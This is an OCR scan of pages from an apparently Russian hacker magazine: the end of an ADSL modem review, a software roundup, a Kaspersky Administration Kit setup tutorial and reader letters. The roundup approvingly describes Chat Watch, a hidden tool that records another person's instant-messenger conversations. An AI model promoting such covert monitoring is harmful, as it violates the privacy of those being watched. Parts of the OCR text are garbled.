доли секунды. А если у тебя неболь- 
шой офис (более двух компьюте- 
ров), и ты подключен по медной па- 
ре, все соединения будут осущест- 
вляться через один компьютер, то 
есть необходимо будет выделить 
сервер. Другим вариантом исполь- 
зования может быть одновременное 
нахождение в Сети и просмотр ци- 
фрового телевидения, например, 
CtpumTB. 


> Kak Bce работает. Подключе- 
ние модема не вызывает проблем. 
Длины всех проводов хватит, чтобы 
поставить его где-нибудь на полочке 
в метре от компьютера. Даже если 
сетевая карта занята, и модем при- 
ходится подключать по USB, уста- 
новка драйверов (необходимая толь- 
ко в случае У$В-подключения), зай- 
мет не больше минуты — руковод- 
ство пользователя написано на рус- 
ском языке. Настройка ZyXEL P- 
660RU EE отнимет немного времени, 
и если тебе не нужно ничего, кроме 
подключения к Сети — просто введи 
логин и пароль в нужной строке. Уч- 
ти, что во время работы устройство 
нагревается, поэтому не следует на- 


крывать его пледом или забрасы- 
вать дисками. После включения мо- 
дема на установление связи с обору- 
дованием провайдера необходимо 
меньше минуты, а это быстрее, чем 
загрузится твой компьютер. 

> — вывод. Возможности ZyXEL 
P-660RU EE очень порадовали, 

а простота настройки и функцио- 
нальность пригодятся при подклю- 
чении целой локальной сети. 
Соединение стабильное даже 

в старых домах, где замена теле- 
фонных кабелей не осуществля- 
лась. Единственным минусом ока- 
зался заметный нагрев модема, по- 
этому необходимо следить 

за вентиляцией © 


ADSL (ASYMMETRIC DIGITAL SUBSCRIBER LINE) — 
«АСИММЕТРИЧНАЯ ЦИФРОВАЯ АБОНЕНТСКАЯ ЛИНИЯ» 
ОБОЗНАЧАЕТ РАЗНЫЕ СКОРОСТИ ПОТОКОВ ДАННЫХ 

ОТ АБОНЕНТА К ПРОВАЙДЕРУ. АСИММЕТРИЧНОСТЬ ПОЗВОЛЯЕТ 
ПЕРЕДАВАТЬ БОЛЬШИЕ ПОТОКИ ДАННЫХ ОТ ПРОВАЙДЕРА 

К АБОНЕНТУ (НАПРИМЕР, ВИДЕО) И НЕБОЛЬШИЕ ОТ АБОНЕНТА 


(В ОСНОВНОМ, ЗАПРОСЫ). 


ADSL: DOWNLOAD — ДО 8 МБИТ/С, UPLOAD — ДО 1 МБИТ/С. 
ADSL2+: DOWNLOAD — ДО 24 МБИТ/С, UPLOAD — ДО 2 МБИТ/С. 


ТЕХНОЛОГИЯ ADSL, ЗА СЧЕТ ЧАСТОТНОГО РАЗДЕЛЕНИЯ 
КАНАЛОВ, ПОЗВОЛЯЕТ ОДНОВРЕМЕННО ПОЛЬЗОВАТЬСЯ 
ИНТЕРНЕТОМ И ГОВОРИТЬ ПО ТЕЛЕФОНУ. ДЛЯ РАБОТЫ 
ADSL2+ ОБОРУДОВАНИЕ ПРОВАЙДЕРА ДОЛЖНО 
ПОДДЕРЖИВАТЬ ЭТУ ТЕХНОЛОГИЮ. 


Test_lab выражает благодарность за предоставленное на тестирование оборудование 


ZyXEL Communications Corporation 


ОФФТОПИК 


НАИСВЕЖАЙШИЕ ПРОГРАММЫ OT NNM.RU 
DOC@NNM.RU 


Chat Watch v4.4.5 

Утилита, способная взять чужой интернет-пейджер под 
свой полный контроль. Chat Watch — одна из немногих 
программ, которым такая работа вполне по плечу. Также 
как и WebMail Spy, она He афиширует своего присутствия 
на компьютере пользователя, хотя каждый раз старатель- 
но загружается вместе с операционной системой. При этом усердное протоколирование всех полу- 
ченных и отправленных юзером сообщений является для Chat Watch главной целью существова- 
ния. Контролю со стороны программы поддается не только аська, но и такие системы онлайнового 
общения, Kak AOL Instant Messenger, MSN Messenger и Yahoo Messenger. 

Требование у Chat Watch лишь одно — у пользователя должен быть установлен оригиналь- 
ный клиент, клоны программе пока не по зубам. Особенно понравилось то, что программа не сва- 
ливает все перехваченные сообщения в один файл, а сохраняет каждую беседу отдельно. Причем 
в журнале наблюдения делается четкая отметка о том, кто, когда и с кем говорил. Запись любой из 
бесед можно просмотреть прямо в окне Chat Watch (русский текст отображается правильно), ски- 


нуть в текстовый файл или отправить по электронной почте. 


HDD Regenerator v1.51 
Программа для восстановления жестких 
дисков — умеет восстанавливать плохие 
секторы. Принцип работы — применение 
специального алгоритма перемагничива- 
ния нечитаемого сектора, позволяющего 
во многих случаях восстановить его. Для этого использует- 
ся специальная загрузочная дискета, создающаяся после 
запуска программы. В деморежиме находит и пытается вос- 
становить только первый bad sector из имеющихся на же- 
стком диске. 

Программа игнорирует файловую систему, просматри- 
вая диск на физическом уровне. Она может использоваться 
с FAT, NTFS или любой другой файловой системой, и также 
с неформатируемыми или неразбитыми дисками. Дает воз- 
можность делать загрузочные дискеты и диски для восста- 
новления из-под DoS’a. 


Sunbelt Network 

Security Inspector v1.6.57.0 

Программа от известного производителя для сканирования 
уязвимостей сети, использующая базу данных с более 3000 
мультиплатформенных уязвимостей. Network Security Inspec- 
tor может сканировать Windows-komnbioTeppl, IP-avana3on, 
порты, машины под управлением Windows, MacOSx, Unix, 
Linux и другие типы устройств. 


Программа формирует отчет 
о приоритетных уязвимостях с эк- 
спортными опциями. Программа 
предоставляет тебе детальные 
и понятные инструкции по устране- 
нию обнаруженных уязвимостей. 
Отчеты разбиты на категории для 
более удобного использования, 
и ты можешь экспортировать 
их в такие форматы как pdf, xls, 
doc, html, xml uv ОВ. Стоимость 
$1,495.00, но это не проблема 
для нас, олигархов :). 


McFunSoft Video Соп- 
vert Master 6.3 
Программа для конвертации, раз- 
резания и склеивания AVI, MPEG, 
MPEG 1, MPEG 2, MPEG 4, VCD, 
DVD, SVCD, RMVB, RM, WMV, 
MOV, DIVX и других медиа-фай- 
лов. Программа также предназ- 
начена для улучшения качества 
видео на домашнем ПК или ТВ. 
Программа имеет дружелюбный 
интерфейс, поэтому работать с 
ней может даже начинающий 
пользователь ПК. Основные воз- 
можности: 


™ ЗАПИСЬ ВИДЕО HA 
DVD/VCD/SVCD; 


“~ ПРЕОБРАЗОВАНИЕ AVI, 
DVD, VCD, SVCD, MPEG, 
MPEG 1, MPEG 2, MPEG 4, 
RM, RMVB, WMV И ДРУГИХ 
ВИДЕО-ФОРМАТОВ; 


“ КОНВЕРТАЦИЯ ФИЛЬМОВ 
В ПАКЕТНОМ РЕЖИМЕ; 


“ ПРЕДПРОСМОТР ПРИ 
КОНВЕРТАЦИИ. 


Amor SWF to Video 
Converter 2.3.8 

Amor SWF to Video Converter — npo- 
грамма для конвертации файлов 
SWF Macromedia Flash в видеофор- 
маты AVI, MPEG, VCD, SVCD и DVD. 
Поддерживает пакетную конверта- 
цию файлов, присоединение фраг- 
ментов к уже существующим видео- 
файлам. 

Кроме этого, Amor SWF to Vi- 
deo Converter позволяет извлекать 
звук из SWF файлов в мультимедий- 
ные файлы MP3 и WAV, а также сох- 
ранять фрагменты изображения 
в УРЕС-файлы. 


NeuroSolutions v5.03 
Developer Edition 

Универсальный нейропакет NeuroSolutions 
фирмы NeuroDimension, Inc предназначен 
для моделирования широкого круга искус- 
ственных нейронных сетей. Основное досто- 
инство описываемого нейропакета состоит в 
его гибкости: помимо традиционно используемых нейросе- 
тевых парадигм (типа полносвязных многослойных нейрон- 
ных сетей или самоорганизующихся полей Кохонена), ней- 
ропакет включает в себя мощнейший редактор визуального 
проектирования нейронной сети, позволяющий создавать 
практически любые собственные нейронные структуры и, 
что немаловажно, собственные алгоритмы их обучения. 


Secure iNet Factoy 
v5.8 for Java 

Secure iNet Factory — это Ha- 
бор компонентов Java для 
разработки безопасных сете- 
вых приложений. Включает 
классы SSH для большинства 
сетевых протоколов, в том 
числе FTP, SMTP, POP3, 
IMAP, HTTP, Telnet и другие. 
С помощью классов и компонентов данного пакета ты 
сможешь создавать ПО с поддержкой шифрования и ау- 
тентификации легко и просто, прямо «из коробки». Пра- 
вда, для того чтобы разобраться, как все работает, нужно 
быть почти профессионалом. 


Fresh Diagnose v7.38 
Вышла новая версия утилиты из из- 
вестного семейства бесплатных про- 
грамм Fresh Devices. Предназначение 
Fresh Diagnose — анализ и тестирова- 
ние системы. После сканирования про- 
грамма выдаст полную информацию о 
периферийных устройствах, сети, про- 
граммном обеспечении. 

Fresh Diagnose может тестировать практически все «железные» компоненты 
компьютера — процессор, винчестер, видеокарту, материнскую плату и пр. Кроме это- 
го, Fresh Diagnose может сравнить вашу систему с другими. В этой версии появился 
модуль учетных записей электронной почты. 


php2exe AVG Free 
Утилита, KOH- Edition 7.1.405 
вертирующая Антивирус включает в себя 


рир-скрипты 

в исполняемые 
ехе-файлы. Скрипт интегрируется в среду, т.е. 
при выполнении скрипт НЕ распаковывается 
на винт, а выполняется как настоящая про- 
грамма из памяти. Перед интеграцией в среду 
скрипт зашифровывается, а перед выполнени- 


следующие компоненты: 
сканер, монитор, сканер 
электронной почты, систему 
автоматического обновления антивирусной ба- 
зы через интернет. Программа может как на- 
ходить, так и лечить зараженные вирусами 
файлы. Для безопасного хранения и лечения 


ем расшифровывается, поэтому в какой-то ме- 
ре это защищает от «крэкеров», хотя, конечно, 
это больше защита от дурака. 

Естественно, для выполнения скрипта в 
папке с exe или в директории system32 дол- 
жна лежать phpdts.dil. 

Из-за того, что разработчики пхп при пе- 
реходе на новую ветку интерпретатора 5.1 не 
удосужились сохранить его совместимость со 
средой 5.0, конвертер предусматривает две 
версии: 5.0 и 5.1. Если ты конвертируешь в 
5.0, а твоя рир5{$.а! версии 5.1, то скрипт, 
увы, работать не будет, точно так же, как если 
конвертнешь скрипт для версии 5.1 и будешь 
запускать с версией phpdts.dil 5.0, скрипт. 


зараженных файлов в этой антивирусной про- 
грамме реализована функция Вирусного хра- 
нилища, в котором и происходят все операции 
с зараженными вирусами файлами. Этот анти- 
вирус умеет совместно работать с файрвола- 
ми сторонних производителей (поддерживает- 
ся работа с Kerio Personal, Zone Alarm Pro и 
файрволом, встроенным в Windows XP), что 
позволяет надежно защитить компьютер от 
различных интернет-угроз и вирусных атак. 


Online Armor v1.1.1.826 
Защищает компьютер от разнообразных неже- 
лательных пришельцев — Spyware, adware, 
кейлоггеров и Т.П. Производит мониторинг си- 
стемы в режиме реального времени и при 06- 
наружении нежелательных «довесков» не- 
медленного блокирует их работу, а затем 

и удаляет из системы. 


PiMone Ver 5.1 
Build:2006.7.4.145 

PiMone — отличный ежедневник, настраивае- 
мый под свои вкусы и особенности, с календа- 
рем, телефонной книжкой и многими другими 
приятностями, которые совершенно необходи- 
мы в повседневной работе. Защита секретных 
записей паролем, поиск по ключевым словам 
и так далее — все к твоим услугам! 


Keyboard Maniac 4.2 

Описание программы стоит начать с опроверже- 
ния информации, опубликованной на официаль- 
ном сайте: «Кеуроага Матас (КеуМап) — это 
менеджер горячих клавиш, который позволяет 
работать с нестандартными клавишами на 
мультимедийных расширенных клавиатурах, без 
установки дополнительных драйверов». Это не- 
правда. Тестирование программы на системах с 
клавиатурами Genius КВ12е и KB16e показало 
неработоспособность программы без установки 
пакета драйверов Media Key. 

Впрочем, читая справку к программе, мож- 
но увидеть несколько иную информацию. Реко- 
мендуется попробовать утилиту KeySpy, которая 
позволяет узнавать коды нажатых клавиш. На 
все нажатия мультимедийных клавиш (клавиату- 
pa Genius KB12e) программа отвечала одинако- 
Bo (КОД «255 0 128»). Далее в справке следует 
информация: «Вам не повезло, нужны родные 
драйвера для вашей клавиатуры. Единого стан- 
дарта нет, каждый производитель делает кла- 
виатуры так, как ему нравится, на одних клавиа- 
турах все дополнительные клавиши перехваты- 
ваются стандартными драйверами Windows, на 
других надо обязательно ставить драйвера изго- 
товителя». Это правда. 


ОФФТОПИК 


oft 


НАСТРОЙКА АНТИВИРУСА КАСПЕРСКОГО. 
СОЗДАНИЕ ГРУПП, ЗАДАЧ И ПОЛИТИК. ЧАСТЬ 2 
АЛЕКСАНДР ПРИХОДЬКО 


(SANPRIH@MAIL.RU) 


Прежде чем приступить к оконча- 
тельной настройке политики, зай- 
дем на машину несчастного нашего 
Балаганова и посмотрим, как 
действует уже созданная нами по- 
литика. Запускаем антивирус 

на машине Балаганова, заходим в 
закладочку «Настройка», выбира- 
ем пункт «Постоянная защита». 
Картина далеко не идеальна: поль- 
зователь может отключить посто- 
янную защиту файловой системы. 
И плюс ко всему операции над 
опасными объектами не соответ- 
ствуют нашей настройке. 


Устраним данную неприятность. 
Заходим в редактирование полити- 
ки (в админките) двойным щелчком 
мыши на ее названии. Идем на зак- 
ладку «Дополнительные» и замыка- 
ем все замочки. Далее закладка 
«Системные задачи». Отмечаем 
все галочки и особое внимание 
уделяем пункту «Постоянная защи- 
та от сетевых атак». Поясню вкрат- 
це. Кто хоть раз ставил себе на ма- 
шину персональный файрвол, тот 
представляет себе, зачем он нужен. 
Для тех, кто не ставил: данная га- 
лочка подключает в антивирусе 


Касперского модуль, ответственный 
за защиту портов компьютера от 
сетевых атак. Это некое подобие 
персонального файрвола. Опять 
же, не забываем замкнуть замочек. 
«Угрозы и исключения» > тут все 
понятно и без объяснений. Если 
у тебя на винте куча околохакерс- 
кого софта, то в отчетах антивиру- 
са ты будешь постоянно лицезреть 
предупредительные надписи. 
Можешь попытаться добавить 
свои любимые кряки и им подобные 
проги в исключения, и, по идее, ан- 
тивирус перестанет на них обра- 
щать внимание. Но это нужно де- 
лать только для себя, любимого, 
а пользователей, балующихся та- 
ким софтом, уничтожать на корню. 
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Итак, отключили у пользователя 
возможность что-либо менять 

в настройках. Теперь только ты 
владеешь антивирусом конечного 
пользователя. 

Еще чуть-чуть про настройки. 
Нужно проверить, все ли настройки 
ты запретил изменять пользовате- 
лю. Для этого вызови свойства по- 
литики и пройдись по всем заклад- 
кам, замыкая замочки. 

С настройками защиты разоб- 
рались. Настроим обновления анти- 
вирусных баз и модулей для Серве- 
ра администрирования. Сначала 
создадим задачу получения обнов- 
лений. В Kaspersky Administration Kit 
заходим в папочку «Глобальные 3a- 
дачи» > «Добавить задачу» -+ за- 
пускается мастер —> «Next» > даем 
имя задаче -+ «Обновления Серве- 
ра администрирования» > «Next» > 
в открывшемся списке задач выби- 
раем приложение Kaspersky 
Administration Kit, а тип задачи > 
Получение обновлений Сервером 
администрирования -— «Next» > вы- 
бираем Сервис обновления лабора- 
тории Касперского. Если твоя сеть 
имеет для выхода в интернет прок- 
си-сервер, то теперь самое время 
ввести его адрес. Наступаем на 
кнопку «Параметры LAN» -+ отме- 
чаем галочкой «Использовать прок- 
си-сервер». Далее опять лиричес- 
кое отступление. Дабы ты мог всег- 
да отслеживать, кто именно из тво- 
ей конторы и зачем лазит в интер- 
нет, и при этом не путать серверы, 
которые занимаются обновлением, 
я рекомендую завести на проксе 
пользователя, под учетной записью 
которого и будут происходить все 


Предупредительные надписи 
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Настройки сети для обновлений 


обновления в твоей сети. Назовем 
его, например, updater. Вписываем 
все параметры > «Next». 

Опять вводим учетную запись. 
Теперь нужна запись, обладающая 
админскими правами на Сервер ад- 
министрирования. Можно оставить 
по умолчанию, ведь ты админом си- 
дишь. «Next». Пришли к расписа- 
нию: если мне не изменяет память, 
Лаборатория Касперского произво- 
дит обновление антивирусных баз 
каждые 3-6 часов. Но ты смотри 
сам, с какой частотой закачивать об- 
новление: при выделенном и посто- 
янном доступе в интернет расписа- 
ние можно настроить раз в сутки — 
ночью, если у тебя диалап — 
то «Вручную», будешь запускать 
сам. Обрати внимание на галочку 
«Запускать пропущенные задачи», 
еще пару раз «Мех», теперь все, 
задача создана. И теперь самое 
главное: чтобы пользователи 
не тратили трафик и не тащили об- 
новления с инета сами, у них необ- 
ходимо пристрелить задачу получе- 
ния обновлений, а Сервер админи- 
стрирования мы сейчас заставим 
раздавать обновления всем клиен- 
там. Лезем на закладку обновле- 
ния — правая кнопка мыши > 
«Properties» — и отмечаем галочкой 
«Автоматически распространять об- 
новления антивирусных баз на кли- 
ентские компьютеры». Теперь об- 
новление будет выглядеть так: Сер- 
вер администрирования закачивает 
обновления и, при загрузке опера- 
ционки, как только он увидит клиен- 
та в сети, то тут же толкнет на него 
обновления баз. 

Еще несколько штрихов и мы 
закончим. Необходимо включить 
распознавание вирусной атаки: 
правая кнопка мыши на Сервере 
администрирования > 
«Properties» > закладка «Вирусная 
атака» — отмечаем галочкой 
«Включить режим распознавание 
вирусной атаки». 

Теперь разберемся с полной 
проверкой компьютера пользовате- 
ля. Естественно, пользователю не 


нравится, когда его машина начи- 
нает тормозить, пользователь злит- 
ся, и стучит на тебя начальству, 
но оставить его без проверки мы не 
можем. Делаем так: все уходят на 
обед примерно в одно и то же вре- 
мя, значит, на это время и настро- 
им полную проверку его машины. 
Для этого создаем задачу, которую 
так и назовем «Полная проверка 
компьютера SRV». 

«Группы» — «Рабочие стан- 
ЦИИ» > «Групповые задачи» - до- 
бавить задачу. Запустился мастер, 
дальше тебе уже все до боли зна- 
komo: «Next» - имя задаче даем 
«Полная проверка компьютера» > 
приложение выбираем «Антивирус 
Касперского 5.0 для Windows 
Workstation» -+ тип задачи «Провер- 
ка по требованию» > «Next» > 
«Уровень защиты» правим рука- 
ми > отмечаем «Настройка пользо- 
вателя» -+ кнопка «Настройка...» > 
закладка «Дополнительно» -+ отме- 
чаем все > «Ок». Теперь «Действия 
над обнаруженным объектом» вы- 
бираем «Лечить, а если невозмож- 
но — удалять» > «Подозрительный 
объект» —> оставляем по умолча- 
нию. Если на компе пользователя 
что-либо обнаружится, он к тебе 
прибежит с жалобами сам. «Next». 
В объектах проверки отмечаем все, 
кроме проверки «Сетевых дисков», 
иначе у тебя вся сеть повиснет 
вверх перьями, если все клиенты 
на обеде начнут проверять сетевые 
диски. «Next». «Учетная запись» — 
здесь ты указываешь учетную за- 
пись локального админа для всех 
клиентских машин. «Next». «Распи- 
сание» — вот и добрались: указы- 
ваешь время своего обеденного пе- 
рерыва. Ставим «Каждый М день» 
и нужное время. И не забудь убрать 
галочку «Запускать пропущенные 
задачи». Иначе, если юзер на обед 
выключит свою машину, то после 
обеда, когда он ее включит, запус- 
тится полная проверка. Дважды 
«Next» и финиш. Задача создана. 
Теперь давай посмотрим, как зада- 


Закладки настройки защиты 


антивируса 


ча накрутилась на машину пользо- 
вателя. Мы не даром назвали сер- 
верную задачу «Полная проверка 
компьютера SRV». Добавление 
SRV позволит нам отличать задачи 
локальные от задач Сервера адми- 
нистрирования. Сначала посмотрим 
на машину пользователя сквозь 
призму админкита. Двойной щелчок 
мыши на машине пользователя, 
закладка «Задачи». 

Теперь глянем, что творится 
на машине самого пользователя. 
Открываем окно Касперского антиви- 
руса, переходим на закладку «Наст- 
ройки» -+ «Проверка по требованию». 

Локальная задача отключена, 
а серверная предписывает прово- 
дить полную проверку каждый 
день в 12.30. 

Все остальные настройки 
ты сделаешь по образу и подобию 
этой. Единственная рекомендация — 
как я уже говорил, для серверных 
задач в названии добавлять какой- 
нибудь опознавательный знак, типа 
SRV. Теперь посмотрим, где же 
у нас на машине клиента прячется 
количество записей в вирусной базе. 
Делаем это через админкит. Двой- 
ной щелчок мыши на машине клиен- 
та, переходим на закладку «Прило- 
жения», двойной щелчок мыши на 
«Антивирус Касперского 5.0 для 
Windows Workstation» и voila. 


Итак, мы настроили практи- 
чески все, что необходимо для за- 
щиты сети от вирусов. Теперь та- 
ким же образом ты создаешь и по- 
литики и задачи для группы «Сер- 
веры». Теперь о глобальных наст- 
ройках. Если у тебя в сети есть 
машины или группы, которые ис- 
пользуют в ежедневной работе 
скрипты, макросы и т.д., то для 
таких машин необходимо создать 
свою отдельную группу и в поли- 
тике этой группы разрешить вы- 
полнение макросов-скриптов. Вот 
почему удобно для разных поли- 
тик создавать отдельные группы. 
Если бы мы прописали политику 
на уровне корневой папки «Груп- 
пы», то уже никакими средствами 
не смогли бы перекрыть политику 
корневой группы. Если сеть боль- 
шая, имеет смысл сегментировать 
ее. Для каждого сегмента создать 
свою группу. В админките есть 
также возможность создавать под- 
чиненные Серверы администриро- 
вания. Тогда сеть будет выглядеть 
примерно так: устанавливается 
корневой Сервер администрирова- 
ния, в корневом сервере создают- 
ся группы, отвечающие за свой 
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сегмент сети. В каждой группе су- 
ществует свой Сервер админист- 
рирования, отвечающий за свою 
группу. Центральный Сервер ад- 
министрирования отвечает за об- 
новления всей сети, он один про- 
изводит закачку обновлений 
программы, модулей и антивирус- 
ных баз и рассылает все обновле- 
ния подчиненным серверам. Те, 

в свою очередь, обновляют клиен- 
тов своих групп. 

Для того чтобы центральный 
Сервер администрирования обнов- 
лял подчиненные серверы, необхо- 
димо выбрать свойства пункта 
«Глобальные задачи» - заклад- 
ка «Настройки» -+ отметить галоч- 
кой «Форсировать обновление под- 
чиненных серверов». 

А в настройках подчиненных 
Серверов администрирования необ- 
ходимо указать источник обновле- 
ния: «Глобальные задачи» — свой- 
ства задачи получения обновле- 
ний > закладка «Настройки» > 


Включение распознавания 
вирусной атаки 


Невозможность изменить 
настройки антивируса 
для пользователя 


в поле «Источник обновления» 
жмем кнопку «Добавить» > 

и отмечаем «Главный Сервер адми- 
нистрирования». 

Все действия, которые мы 
произвели, предлагается откатать 
на одной клиентской машине. 
После откатки политик, задач, 
получения обновлений, проверки 
машины клиента ты готов развер- 
нуть антивирус за один раз на всей 
своей сети. 

Лирическое отступление: воз- 
можности админкита позволяют ав- 
томатически разворачивать антиви- 
рус при включении новой машины 
в сеть. Это можно сделать на осно- 
ве данных Active Directory, на OCHO- 
ве |Р-адресов. Для автоматического 
разворачивания необходимо зайти 
в свойства папки «Группы» -+ зак- 
ладка «Клиентские компьютеры» — 
и изучить возможности данной 
настройки. Однако предпочтитель- 
нее, наверно, контролировать весь 
процесс вручную, через созданные 
группы для установки. 

В папке «Удаленная установ- 
ка» находятся инсталляционные па- 
кеты. При запуске пакета появляет- 
ся Мастер установки. Через него 


тоже можно установить антивирус 
оптом на большое количество ма- 
шин. Методов много, дерзай. 
Обратим теперь свой незамут- 
ненный вирусами взор на способы 
просмотра событий средствами ад- 
минкита. Для беглого просмотра 
состояния защиты сети достаточно 
зайти на закладочку «Состояние 
защиты». Ежедневно тебя должно 
интересовать два пункта: «Антиви- 
русная статистика» и «Обновле- 
ния». Для более подробного анали- 
за процессов, связанных с антиви- 
русной защитой, заходим в папку 
«Отчеты», выбираем интересующий 
нас отчет, при необходимости вы- 
бираем период, за который нас ин- 
тересуют данные, активируем пункт 
«Включать данные с подчиненных 


Серверов администрирования» 

и нажимаем кнопку «Создать от- 
чет». Чтобы тебя не мучили ранее 
пойманные и благополучно убитые 
вирусы, имеет смысл в графе «Пе- 
риод создания отчетов» выбирать 
одни сутки. Тогда ты будешь видеть 
статистику только по свежепойман- 
ным вирусам. 

И напоследок: приходишь ут- 
ром на работу, даешь полчаса, что- 
бы все опоздавшие успели вклю- 
чить свои компьютеры, заходишь 
в админкит, наступаешь на цент- 
ральную папку «Группы». Видишь 
в корне папки все компы своей се- 
ти бледно розового цвета, выделя- 
ешь их всех и тащишь в группу 
«Установка Workstation». Заходишь 
в группу «Установка Workstation» > 
«Групповые задачи» и запускаешь 
сначала задачу «Установка Аген- 
та», через часик смотришь в отче- 
тах, насколько успешно прошла ус- 
тановка. Затем запускаешь задачу 
«Установка Workstation». После 
обеда смотришь отчеты. На следу- 
ющее утро ты заходишь в админ- 
кит и перетаскиваешь все компы 
из группы «Установка Workstation» 
в группу «Рабочие станции». И те- 
перь спокойно контролируешь ан- 
тивирусную защиту всей сети. Если 
где-то установка прошла со сбоем, 
читаешь отчет об ошибках в ад- 
минките. Обычно при установке 
у пользователя либо не хватает ад- 
минских прав, тогда на конкретную 
машину ты указываешь другого 
пользователя с необходимыми пра- 
вами, либо пользователь выключил 
машину и оборвал связь с Серве- 
ром администрирования. Обрыва- 
ешь ему руки. Всю установку ты 
можешь провести за день, после 
чего необходимо принудительно 
перегрузить все клиентские маши- 
ны. Но я не думаю, что твоему на- 
чальству это понравится. Ну, все, 
удачи в борьбе с вирусами. В сле- 
дующий раз мы займемся установ- 
кой файрвола © 
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Здравствуйте, журнал Хакер! 

С какой периодичностью выходит Хакер СПЕЦ и бывает ли он с DVD? Хочу 
подписаться, но не знаю, как правильно оформить подписку. 

До свиданья. 


Привет! 

Хакер СПЕЦ — ежемесячный журнал, с DVD его пока не бывает, но, 
по всей видимости, скоро будет, так что недолго тебе осталось 
ждать. Что касается подписки, где-то на обложках журнала есть 
бесплатный телефон, по которому тебе все расскажут о подписке, к 
сожалению, нет возможности цитировать все уже сказанное. Милос- 
ти просим! 

С уважением, твоя команда. 


Нех-тх@уапаех.ги 
бэдные хакеры 
под писка 


Привет, хаккеры. 
Я недавно прочитал, что вы, оказывается, помираете с голоду, потому что 
никто не покупает ваш журнал: все его електронную версию читают. 
Поэтому я решил, что мне не нужен бесплатный номер аля Мурзилка. 
А то что же это будет: вы совсем обессилите без еды, не сможете ничего 
больше написать. Мне нечего будет читать. Ваш журнал закроется! А вслед 
за вашим и другие журналы закрываться начнут! 
Потом люди перестанут смотреть телевизор! Телевидение обанкро- 
титься и тоже закроется. Нам не будут говорить правды! Мы ничего знать не 
будем! И тут настанет апокалипсис, полтрГейтс! Отовсюду, изо всех щелей 
полезут эти проклятые капиталисты американцы со своими платными прог- 
раммами и китайцы, много, много китайцев, которые будут продавать нам 
глючные компьютеры. А хакеров не будет, не будет взломанных программ, 
не будет кряков, не будет ключей, не будет серийников, не будет лекарств. 
КАКОЙ УЖАС!!! Этого нельзя допустить! Что же делать!!! Я сегодня 
купил 15 номеров ваших журналов. Я копил на велосипед, но я же не могу 
допустить, чтобы хакеры умирали от голода. Может, вы номер web-money 
опубликуете, мы бы вам WMZ отправляли, а? 
Пионер! Ты в ответе за все!!! 


Флекс, привет! 

Неужели! Неужели наконец-то кто-то нас понял. Честно говоря, 
я уже и не надеялся. И мы всей редакцией хотим тебе сказать 
Большое Человеческое Спасибо! Если бы не ты, тиражи нашего 
журнала в этом месяце упали бы в разы, но мы пошли с твоим 
письмом к Тому, Кто Зажигает Звезды в нашем издательстве, 

и он решил продлить нашу агонию еще на месяц. 

Спасибо тебе, брат. 

Мы с тобой плечом к плечу боремся за правое дело! Так дер- 
жать. И запомни, партия не забудет твоих заслуг — мы, установив 
вселенское господство, обязательно купим тебе новый велосипед! 
И каждому воздастся по делам его! И даже больше... 

Аминь (наличные лучше пересылать почтовым переводом в 
адрес редакции — не дадим WebMoney нажиться на наших священ- 
ных пожертвованиях). 


nonamexGlist.ru 
Дамир Аминев 
интересное видео 


Здравствуйте, уважаемая редакция журнала Хакер!!! 

Мне как-то под руки попался замечательный файл. Пожалуйста, 

обратите внимание на размер этого файла и качество видео. И мне очень 
интересно узнать, каким образом его создали. И вы можете создать 
что-нибудь подобное? 

Заранее большое спасибо за оказанную помощь! 


Привет, Дамир! 

Нам часто под руки попадаются замечательные файлы: кому-то с 
расширением MPG, кому-то AVI, кому-то даже WVM - всегда счи- 
тал, что это основные расширения видео-файлов. Но Доктору 
Клунизу, оказывается, попадались видео-файлы с расширением 
ЕХЕ! Это был как раз тот случай, когда кто-то попытался ему 
прислать троян на Дельфи. Доктор так и не принял до конца это 
письмо, ибо весило оно 1.5 Мб, а сидели все на dialup'e. Видимо, 
ты был его автором? Что ж, если так, то ты заметно продвинулся: 
этого троянца уже легко загрузить даже Ha dialup'e! Поздравляем! 
Поздравления же просили передать и сотрудники ФСБ, куда мы 
перенаправили твой замечательный видео-файл. Они же обеща- 
ли зайти к тебе на досуге, рассказать подробнее, как его создать, 
и дать тебе целую уйму времени на то, чтобы ты смог более де- 
тально ознакомиться с темой. Весьма вероятно, что даже наедине 
с самим собой :-). 

Всегда рады помочь. Удачи! 


© root-god@gmail.ru 

обожаю ваш magazin 

Хелло, Хакер! 

Обожаю ваш Magazin (на великом и могучем — «журнал»)! Я Кодер и горжусь 
этим, и поэтому прошу делать побольше выпусков про Кодинг (лучше на Дель- 
фи). Tak же *пх'ойдов становится все больше и больше! В общем, будьте! 
З.Ы. Какие выпуски Хакер неспец про кодинг? (попрошу их у друганов — 
пингвинов). 


Привет, корень-бог! 

Мы тоже любим наш магазин. Как же иначе? Если бы не он, кто бы 
нас снабжал пищей для ума и тела? И только он является бессмен- 
ным источником горючего на базе легких спиртов, поддерживаю- 
щего наши бренные тела в бодрствующем состоянии. Да и продав- 
щицы там симпатичные... Впрочем, о чем это я? 

Насчет кодинга на Дельфи, к сожалению, придется немножко 
повременить — сейчас мы готовим номера о кодинге на Бейсике и 
Visual Fortran, так что как минимум только через 2 номера. Ho обя- 
зательно постараемся накреативить что-нибудь достойное всех ко- 
деров на Дельфях! И пингвинов тоже. 

А вообще, я очень рекомендую тебе перейти с Паскаля на 
какой-нибудь «взрослый» язык программирования — например, 
ассемблер .NET. Microsoft недавно выпустили очень удобную 
модификацию этого асьма. Зайди на сайт, скачай и лабай 
программки в стиле RAD, к которому так привык! 

P.S. Боюсь, что про кодинг практически каждый номер Хакер 
неспец, так или иначе, так что скупай их все и желательно оптом. 
Так же, как это делает коллега выше по тексту. 


shtrenyov@mail.ru 
Штренев Евгений Вячеславович 
«Царь-Хостинг» 


Здравствуйте! 

Прочитал статью «Царь-Хостинг», попробовал сделать все это сам, только 
на FreeBSD 5.3 — release. Изменил только make.conf, как сказано в статье, 
но теперь при компиляции ядра пишет: 


cc: aicasm.o: No such file or directory 

cc: aicasm_symbol.o: No such file or 
directory 

cc: aicasm_gram.o: No such file or directory 
cc: aicasm.o_macro_gram: No such file 
or directory 

cc: aicasm.o_scan: No such file or directory 
cc: aicasm_macro_scan.o: No such file or 
directory 

Вот cam make.conf 

CPU_TYPE?=p3 

CPU_TYPE=p3 

COMPAT4X=true 

CFLAGS=-ol -pipe -march=pentium3 - 
mtune=pentium3 NO_CPU_FLAGS=false 
NO_CPU_COPTFLAGS=false 
MAKE_KERBEROS4=false MAKE_KER- 
BEROS4=false NO_BIND=true 
NO_SENDMAIL=true NO_GAMES=true 
PERL_VER=5.8.5 
PERL_VERSION=5.8.5 
PERL_ARCH=mach 

NOPERL=no 

